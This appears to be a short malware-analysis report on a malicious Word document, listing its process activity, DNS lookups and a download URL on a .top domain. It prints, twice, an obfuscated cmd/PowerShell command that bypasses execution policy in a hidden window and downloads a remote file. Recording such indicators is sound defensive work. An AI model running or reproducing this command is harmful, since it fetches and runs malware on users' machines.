Technical Information
- %ProgramFiles(x86)%\microsoft office\office16\winword.exe
- http://dogtosamdnc.top/search.php as %appdata%.exe
- '%WINDIR%\syswow64\cmd.exe' /c "pOWEr^sH^ELL.ex^e -e^x^eC^ut^Io^npol^Icy^ ^BYPA^S^s^ ^-^NOPR^O^f^i^l^E -^w^IND^Ow^stYle^ HIdDe^N^ (^n^eW-^Ob^j^e^ct sYs^TeM.n^et^.W^EB^C^liEnT).d^ow^N^LoADfi^LE^('http://...
- 'me######.#emplates.cdn.office.net':443
- 'me######.#emplates.cdn.office.net':443
- DNS ASK me######.#emplates.cdn.office.net
- DNS ASK do###samdnc.top
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c "pOWEr^sH^ELL.ex^e -e^x^eC^ut^Io^npol^Icy^ ^BYPA^S^s^ ^-^NOPR^O^f^i^l^E -^w^IND^Ow^stYle^ HIdDe^N^ (^n^eW-^Ob^j^e^ct sYs^TeM.n^et^.W^EB^C^liEnT).d^ow^N^LoADfi^LE^('http://...' (with hidden window)